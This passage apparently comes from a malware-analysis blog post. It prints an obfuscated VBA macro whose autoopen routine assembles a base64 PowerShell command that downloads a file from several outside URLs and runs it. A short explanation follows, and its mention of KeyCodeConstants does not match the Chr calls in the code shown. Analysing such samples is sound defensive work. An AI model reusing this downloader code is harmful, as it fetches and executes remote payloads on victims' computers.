	SomS25ZG = ABaAF  MAPQ  AoACc  AaAAn  ACs  AJwB0A  HQAJw  ArACcA
	GNc88i = cAA6A  C8AJwA  rACcAL  wBk  ACcAKw  AnA
	UOiYERH = QX0ipWjQ  qYGMCi2F  ZzzVfP  zVCl3I58  fcsnuE  cNsVZwis  SomS25ZG  GNc88i

	UOiYERH = wershell-e JABIAEwAMwAzAFIAQwBSADAAPQAoACcASwB2ACcAKwAnAGQATAAnACsAJwB1AHAAcgAnACkAOwAkAEoARwBUADkAaQBZAE8AYgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABQAGYAdwBIAGMAWABaAFMAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8AJwArACcALwBkACcAKwAnA

End Function

Function B8waSCi()
	On Error Resume Next
	mm44hw = GEA  JwA  rAC  cAZA  BhACcA  KwA
	o8NUEiH = nAG  YAYQBy  AGkAb  gBnAG8  AcwA  nACsAJ
	jzYz573 = wB0A  GEAcgA  nACs  AJwAuA  CcAKw  AnAG  MAJwAr  ACcAb
	J6EaO6 = wBtAC8  AJw  ArA  CcAcgB  0AF  EAdwBU
	woo96Zz6 = ACcAK  wAnADU  AJw  ArACcA  NQB6  AEAA
	zpfFBH = JwAr  ACcA  aAB0AH  QAcA  AnACs  AJwA6  AC8ALw  AnACsA
	bOIDQsaj = JwBm  AGkAJ  wArAC  cAbABl  ACc  AKw
	J8cCvsJ = AnAC4  AbABhA  HUAYQ  BzAGk  Abg  BoAC4  AYwB  vAG0
	B8waSCi = mm44hw + o8NUEiH + jzYz573 + J6EaO6 + woo96Zz6 + zpfFBH + bOIDQsaj + J8cCvsJ

	B8waSCi = GEAJwArACcAZABhACcAKwAnAGYAYQByAGkAbgBnAG8AcwAnACsAJwB0AGEAcgAnACsAJwAuACcAKwAnAGMAJwArACcAbwBtAC8AJwArACcAcgB0AFEAdwBUACcAKwAnADUAJwArACcANQB6AEAAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBmAGkAJwArACcAbABlACcAKwAnAC4AbABhAHUAYQBzAGkAbgBoAC4AYwBvAG0

End Function

Function BIBrlzL()
	On Error Resume Next
	LvY3XP = AJw  ArA  CcA  LwAn  ACs  AJw
	Dcvnnls = BQAC  cAK  wAnAF  gAZQBo  AEwA  JwA  rACcA  UAAnAC
	Bkabza = sAJwBQ  AGw  AQA  AnACsA  JwBo  AHQAdA
	wbqHZhV = AnA  CsA  JwBw  ACcA  KwAnA  DoAJwA  rAC  cALwAv  AGEA
	nDv43V = JwArA  CcAbgA  nACsAJ  wBn  AGkAcg  BhAH
	rWLso0 = MALgAn  ACsA  JwBv  AHIAJ  wArAC  cAZw  AvAH
	jiC3ZwNt = gAJwAr  ACcAOA  BCAC  cAK  wAnAG  oAYQB  NAC  cAKwA
	NpY8wL9 = nADQ  AJw  ArA  CcAN  AAnA  CsAJwA
	Shl9iw = 0AEkA  QABoAH  QAdAA  nACs  AJw  BwACc + AKwAnA
	zhGozS = DoA + LwA + vAGEA + ZABzAH + UAaQB + kAGU
	BIBrlzL = LvY3XP + Dcvnnls + Bkabza + wbqHZhV + nDv43V + rWLso0 + jiC3ZwNt + NpY8wL9 + Shl9iw + zhGozS

	BIBrlzL = AJwArACcALwAnACsAJwBQACcAKwAnAFgAZQBoAEwAJwArACcAUAAnACsAJwBQAGwAQAAnACsAJwBoAHQAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAvAGEAJwArACcAbgAnACsAJwBnAGkAcgBhAHMALgAnACsAJwBvAHIAJwArACcAZwAvAHgAJwArACcAOABCACcAKwAnAGoAYQBNACcAKwAnADQAJwArACcANAAnACsAJwA0AEkAQABoAHQAdAAnACsAJwBwACcAKwAnADoALwAvAGEAZABzAHUAaQBkAGU

End Function

Function wBuzmLiw()
	On Error Resume Next
	qc2z0SEi = ALgBjA  GwAJwA  rACcAd  QBiA  C8AeQ  AnACs  AJwA3A  CcA
	Oujhvq7b = KwAnA  DcAUQB  UAEsA  aABW  AEAAa
	QV7zAXF = AAnAC  sAJwB0  AHQ  AcAAn  ACsAJw  A6AC8
	BzjlMR1F = ALwBt  AGkAY  wBoA  GEAZQ  BsAHc  Acg
	OQKf7zP = BpAG4  AZwBs  ACcAK  wAnAGU  AJwArA  CcAcgA  uAG  MAbwAn
	ds84PI = ACs  AJw  BtAC8A  SQBSA  FkAWQ
	bZjAXG = AnAC  sAJwBx  AFAAY  gA1AC  cAKwAn  AE4AJw  ApA  C4AUwB
	lsk59K2 = wAGwA  aQB  0ACgAJ  wBA  ACcA  KQA7AC  QAa  QAw
	MzvEWt = ADUANQ  BhAG  wATw  BQAD  0AK
	CSfGq3 = AAn  AHQAcA  BZA  EUAM  gBvACc  AKw
	sXIO3j = AnAG  0AMQ  AnAC  kAOwA  kAE
	wBuzmLiw = qc2z0SEi + Oujhvq7b + QV7zAXF + BzjlMR1F + OQKf7zP + ds84PI + bZjAXG + lsk59K2 + MzvEWt + CSfGq3 + sXIO3j

	wBuzmLiw = ALgBjAGwAJwArACcAdQBiAC8AeQAnACsAJwA3ACcAKwAnADcAUQBUAEsAaABWAEAAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwBtAGkAYwBoAGEAZQBsAHcAcgBpAG4AZwBsACcAKwAnAGUAJwArACcAcgAuAGMAbwAnACsAJwBtAC8ASQBSAFkAWQAnACsAJwBxAFAAYgA1ACcAKwAnAE4AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAaQAwADUANQBhAGwATwBQAD0AKAAnAHQAcABZAEUAMgBvACcAKwAnAG0AMQAnACkAOwAkAE

End Function

Function Mnv94H()
	On Error Resume Next
	n8DNvz = kARQB  wAEgAa  gBqA  CAAPQA  gACgAJ  wA2ADU  AJwAr  ACcAN  AAnAC
	uAwdTGD5 = kAOw  AkA  G0AVQ  B1AFc  AZABG
	LOw02E5 = AD0A  KAAnAF  IAM  ABhAHE  AJwA  rACcAM  QBsAD  AAJw  ArACc
	UaU4Jz1 = ATwA  nACkAO  wAkA  GQA  RwB  CAFQAb
	mLUvTz7 = AA0AHE  APQAk  AGU  AbgB  2ADoAd
	nJIQQcw = QBzAG  UAcgB  wAHI  Abw  BmA  GkA
	mnhC8GqR = bABlAC  sAJwB  cACcAK  wAkAEk  ARQBwA  EgAa  gBqAC  sAKAAn
	WCrXbI = AC4A  ZQA  nACs  AJwB4  AGU  AJwAp  ADsAZ  gBvA  HIAZ
	Mnv94H = n8DNvz + uAwdTGD5 + LOw02E5 + UaU4Jz1 + mLUvTz7 + nJIQQcw + mnhC8GqR + WCrXbI

	Mnv94H = kARQBwAEgAagBqACAAPQAgACgAJwA2ADUAJwArACcANAAnACkAOwAkAG0AVQB1AFcAZABGAD0AKAAnAFIAMABhAHEAJwArACcAMQBsADAAJwArACcATwAnACkAOwAkAGQARwBCAFQAbAA0AHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkARQBwAEgAagBqACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZ

End Function

Function Qd66bAu()
	On Error Resume Next
	l7cRfN7 = QBh  AGM  AaAAo  ACQATQ  A4AF  UAMQB6
	tuOdbcb = AHcAI  ABpAG  4AIAAk  AFA  AZgB3  AEgAYw  BYAFoA  UwApA  HsAdAB
	pouJSzs = yAHkA  ewAk  AEoARw  BUADkA  aQBZ  AE8AY
	RwmuL9zj = gAuA  EQAbw  B3AG4  AbA  BvAGEA  ZABGA  GkAbA
	d1E4tZ = BlACgA  JAB  NADgAV  QAxA  HoAd  wAsA  CAAJ
	zPOMJu0d = ABk  AEcAQ  gBU  AGwA  NABxA  CkA  OwAk  AE8  ARA
	SfBGzL = B6AEQA  SwA5AD  MAPQA  oACcA  ZgAn  ACs  AJwBqA
	JnMhEm06 = EgAegB  EAGwA  cAAnAC  sAJwA  1ACcA
	WuLoWdq = KQA7A  EkAZgA  gACgA  KABHA  GUA  dAA  tAEkA  dABlA  G0AI
	d6H2AFR = AAkA  GQARw  BCAF  QAb  AA0AHE  AKQAuA  GwA
	Qd66bAu = l7cRfN7 + tuOdbcb + pouJSzs + RwmuL9zj + d1E4tZ + zPOMJu0d + SfBGzL + JnMhEm06 + WuLoWdq + d6H2AFR

	Qd66bAu = QBhAGMAaAAoACQATQA4AFUAMQB6AHcAIABpAG4AIAAkAFAAZgB3AEgAYwBYAFoAUwApAHsAdAByAHkAewAkAEoARwBUADkAaQBZAE8AYgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABNADgAVQAxAHoAdwAsACAAJABkAEcAQgBUAGwANABxACkAOwAkAE8ARAB6AEQASwA5ADMAPQAoACcAZgAnACsAJwBqAEgAegBEAGwAcAAnACsAJwA1ACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGQARwBCAFQAbAA0AHEAKQAuAGwA

End Function

Function misB743q()
	On Error Resume Next
	ADNMmcl = ZQBuA  GcA  dABo  ACAA  LQBn  AGUA  IAA0AD  AAMA  AwA
	dUWofu = DAA  KQA  gAHsAS  QBuA  HYA
	sEdLvJE = bwBrAG  UALQB  JAHQA  ZQBtAC  AAJA  BkAEc
	d5wpXhz = AQgBU  AGwAN  ABxA  DsAJAB  jADcA  agBp  AFEAMw  A9ACg
	W1qwKF = AJwB  3AG  kAJw  ArACc  AZA  AyAFo  AVw  BZAC  cAKQ
	misB743q = ADNMmcl + dUWofu + sEdLvJE + d5wpXhz + W1qwKF

	misB743q = ZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAEcAQgBUAGwANABxADsAJABjADcAagBpAFEAMwA9ACgAJwB3AGkAJwArACcAZAAyAFoAVwBZACcAKQ

End Function

Function SvYi5Y()
	On Error Resume Next
	B6II8P = A7AG  IAc  gBl  AGE  AawA  7AH0  AfQ
	FckbN7Qj = BjA  GEAdA  BjA  GgAe  wB9AH  0AJ  ABPAHE  ASwB
	pDT9WTn = 3AGQ  AcAA  9ACgA  JwBYAE  4ASwA  nACsA  JwBYA
	EIEU9Tz = EUA  SwAnA  CkAO  wA=
	SvYi5Y = B6II8P + FckbN7Qj + pDT9WTn + EIEU9Tz

	SvYi5Y = A7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABPAHEASwB3AGQAcAA9ACgAJwBYAE4ASwAnACsAJwBYAEUASwAnACkAOwA=

End Function


Sub autoopen()
	On Error Resume Next
	pjs7kH = Chr(80)
	GGS8A1j = Chr(79)
	DsiufjK pjs7kH + GGS8A1j + UOiYERH + B8waSCi + BIBrlzL + wBuzmLiw + Mnv94H + Qd66bAu + misB743q + SvYi5Y, 0
End Sub

From here, it is pretty simple to understand and to see. Basically all the strings/variables get concatenated together to form the encoded base64 string. What I found interesting though was in the autoopen function and the fact that it was using “KeyCodeConstants” (ie: KeyCodeConstants.vbKeyP) to help build the script. This is something that I have not seen before in a script. For more information about this, see this page: http://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/keycode-constants. In those two lines, it looks like it is taking the “CHR” value (P and O respectively), converting that over to ASCII, which then gets represented as a letter. The last line is the one that puts everything together and spells out “POwershell – e” via the shell function.

Leave a Reply

Your email address will not be published. Required fields are marked *